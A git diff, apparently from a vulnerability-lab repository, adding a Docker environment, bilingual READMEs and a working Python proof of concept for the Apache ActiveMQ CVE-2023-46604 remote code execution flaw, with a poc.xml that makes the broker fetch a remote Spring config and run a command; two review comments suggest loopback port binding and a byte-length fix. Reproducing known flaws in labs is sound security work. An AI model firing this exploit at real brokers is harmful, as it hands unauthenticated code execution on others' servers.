diff --git a/activemq/CVE-2023-46604/01.png b/activemq/CVE-2023-46604/01.png
new file mode 100644
index 0000000000..8c8e768447
Binary files /dev/null and b/activemq/CVE-2023-46604/01.png differ
diff --git a/activemq/CVE-2023-46604/README.md b/activemq/CVE-2023-46604/README.md
new file mode 100644
index 0000000000..3fd417eaa4
--- /dev/null
+++ b/activemq/CVE-2023-46604/README.md
@@ -0,0 +1,46 @@
+# Apache ActiveMQ (Version < 5.18.3) RCE (CVE-2023-46604)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+## Environment setup
+
+Enter following commands to build and run the vulnerability environment:
+
+```
+docker compose up -d
+```
+
+The environment listens to port 61616 and port 8161, of which 61616 is the working port. In this vulnerability exploitation, we only need to use port 61616. When executing the vulnerability verification process, please first access port 8161 to confirm that the service has started successfully.
+
+Visit `http://your-ip:8161/` to see the web page, indicating that the environment has been successfully run.
+
+## Background brief
+
+Apache ActiveMQ has a remote code execution vulnerability. This vulnerability may allow remote attackers with network access privileges to execute arbitrary shell commands by manipulating the serialized class types in the OpenWire protocol, leading to the instantiation of any class on the classpath of the agent.
+
+| Default port | Default Condition |
+|--------------|--------------------------------------|
+| 8161 (web) | Remote access requires configuration |
+| 61616 (tcp) | Remote access allowed |
+
+## Exploit
+
+You can quickly start an HTTP server in the folder where the poc.xml file is located using the Python3 http.server module
+
+```shell
+python3 -m http.server 6666
+```
+
+execute poc.py
+
+```shell
+python3 poc.py target port http://ip of http server/poc.xml
+```
+
+You can check inside the ActiveMQ container using the following command:
+
+docker exec cve-2023-46604-activemq-1 ls -l /tmp
+
+If you see the output showing that touch /tmp/activeMQ-RCE-success has been executed successfully, then the exploit has worked.
+
+![01.png](01.png)
\ No newline at end of file
diff --git a/activemq/CVE-2023-46604/README.zh-cn.md b/activemq/CVE-2023-46604/README.zh-cn.md
new file mode 100644
index 0000000000..c115a3ef7d
--- /dev/null
+++ b/activemq/CVE-2023-46604/README.zh-cn.md
@@ -0,0 +1,44 @@
+# Apache ActiveMQ (版本 < 5.18.3) RCE (CVE-2023-46604)
+
+## 环境搭建
+
+搭建及运行漏洞环境:
+
+```
+docker compose up -d
+```
+
+环境监听61616端口和8161端口,其中8161为web控制台端口,61616为工作端口。在本次漏洞利用中,我们只需要用到61616端口。执行漏洞验证过程时,请先访问8161端口,确认服务启动成功。
+
+访问`http://your-ip:8161/`看到web页面,说明环境已成功运行。
+
+## 背景简述
+
+Apache ActiveMQ存在远程代码执行漏洞。该漏洞可能允许具有网络访问权限的远程攻击者通过操纵OpenWire协议中的序列化类类型来运行任意shell命令,从而导致代理实例化类路径上的任何类。
+
+| 默认端口 | 默认条件 |
+|-----------|-----------|
+| 8161 web | 需配置才可远程访问 |
+| 61616 tcp | 远程访问 |
+
+## 漏洞复现
+
+在poc.xml的文件夹下启动http服务
+
+```shell
+python3 -m http.server 6666
+```
+
+执行poc.py
+
+```shell
+python3 poc.py target port http://启动http服务的ip/poc.xml
+```
+
+到activeMQ容器中进行查看:
+
+docker exec cve-2023-46604-activemq-1 ls -l /tmp
+
+可以看到touch /tmp/activeMQ-RCE-success成功被执行:
+
+![01.png](01.png)
diff --git a/activemq/CVE-2023-46604/docker-compose.yml b/activemq/CVE-2023-46604/docker-compose.yml
new file mode 100644
index 0000000000..22e9f9b269
--- /dev/null
+++ b/activemq/CVE-2023-46604/docker-compose.yml
@@ -0,0 +1,7 @@
+version: '2'
+services:
+ activemq:
+ image: vulhub/activemq:5.11.1-with-cron
+ ports:
+ - "61616:61616"
+ - "8161:8161"
\ No newline at end of file
diff --git a/activemq/CVE-2023-46604/poc.py b/activemq/CVE-2023-46604/poc.py
new file mode 100644
index 0000000000..fa453ec86f
--- /dev/null
+++ b/activemq/CVE-2023-46604/poc.py
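Review bot: The `ports:` entries publish 61616 and 8161 on every host interface, and the README in this same change states that 61616 accepts remote connections by default, so bringing the lab up on a shared or internet-reachable host hands a pre-auth RCE to anyone who can reach the machine. Binding the published ports to loopback, `- "127.0.0.1:61616:61616"` and `- "127.0.0.1:8161:8161"`, keeps the broker reachable from the host (which is all the README's walkthrough needs) without exposing it further; a comment explaining that choice would stop the next contributor from reverting it. Separately, `version: '2'` is the legacy Compose-file key; newer `docker compose` releases appear to warn that it is obsolete, so it can probably be dropped — worth confirming against the Compose version the project targets.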
@@ -0,0 +1,36 @@
+import io
+import socket
+import sys
+
+
+def main(ip, port, xml):
+ classname = "org.springframework.context.support.ClassPathXmlApplicationContext"
+ socket_obj = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+ socket_obj.connect((ip, port))
+
+ with socket_obj:
+ out = socket_obj.makefile('wb')
+ # out = io.BytesIO() # 创建一个内存中的二进制流
+ out.write(int(32).to_bytes(4, 'big'))
+ out.write(bytes([31]))
+ out.write(int(1).to_bytes(4, 'big'))
+ out.write(bool(True).to_bytes(1, 'big'))
+ out.write(int(1).to_bytes(4, 'big'))
+ out.write(bool(True).to_bytes(1, 'big'))
+ out.write(bool(True).to_bytes(1, 'big'))
+ out.write(len(classname).to_bytes(2, 'big'))
+ out.write(classname.encode('utf-8'))
+ out.write(bool(True).to_bytes(1, 'big'))
+ out.write(len(xml).to_bytes(2, 'big'))
+ out.write(xml.encode('utf-8'))
+ # print(list(out.getvalue()))
+ out.flush()
+ out.close()
+
+
+if __name__ == "__main__":
+ if len(sys.argv) != 4:
+ print("Please specify the target and port and poc.xml: python3 poc.py 127.0.0.1 61616 "
+ "http://192.168.0.101:8888/poc.xml")
+ exit(-1)
+ main(sys.argv[1], int(sys.argv[2]), sys.argv[3])
diff --git a/activemq/CVE-2023-46604/poc.xml b/activemq/CVE-2023-46604/poc.xml
new file mode 100644
index 0000000000..60a7dbf2e0
--- /dev/null
+++ b/activemq/CVE-2023-46604/poc.xml
@@ -0,0 +1,14 @@
+
+
+
+
+
+ touch
+ /tmp/activeMQ-RCE-success
+
+
+
+
\ No newline at end of file
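Review bot: The 2-byte length prefix written by `out.write(len(xml).to_bytes(2, 'big'))` counts characters, not bytes, so a URL containing any non-ASCII character is sent with a short length and the frame is malformed; encode once and prefix the encoded length — `xml_b = xml.encode('utf-8')`, `out.write(len(xml_b).to_bytes(2, 'big'))`, `out.write(xml_b)` (the `classname` constant is pure ASCII, so its `len` happens to be right, but the same pattern would be safer there too). The sequence of `out.write` calls is a hand-packed OpenWire frame and none of its fields are named; a short comment on each write (`# size prefix`, `# type 31 = ExceptionResponse`, `# command id`, `# response required`, `# correlation id`, `# exception not-null flag`, `# class name not-null flag`, `# message not-null flag`) would make the layout readable without changing a byte. The leading `int(32).to_bytes(4, 'big')` is a fixed size prefix that does not match the real frame length, which presumably only works because the broker does not use that value to bound its read — confirm and record that in a comment, or compute the length from the assembled body (the commented-out `io.BytesIO()` line suggests that was the original plan). With that line commented out `import io` is unused, and the dead `# print(list(out.getvalue()))` line should go with it; `exit(-1)` is the interactive-site helper, and `sys.exit(1)` is the conventional form for a script.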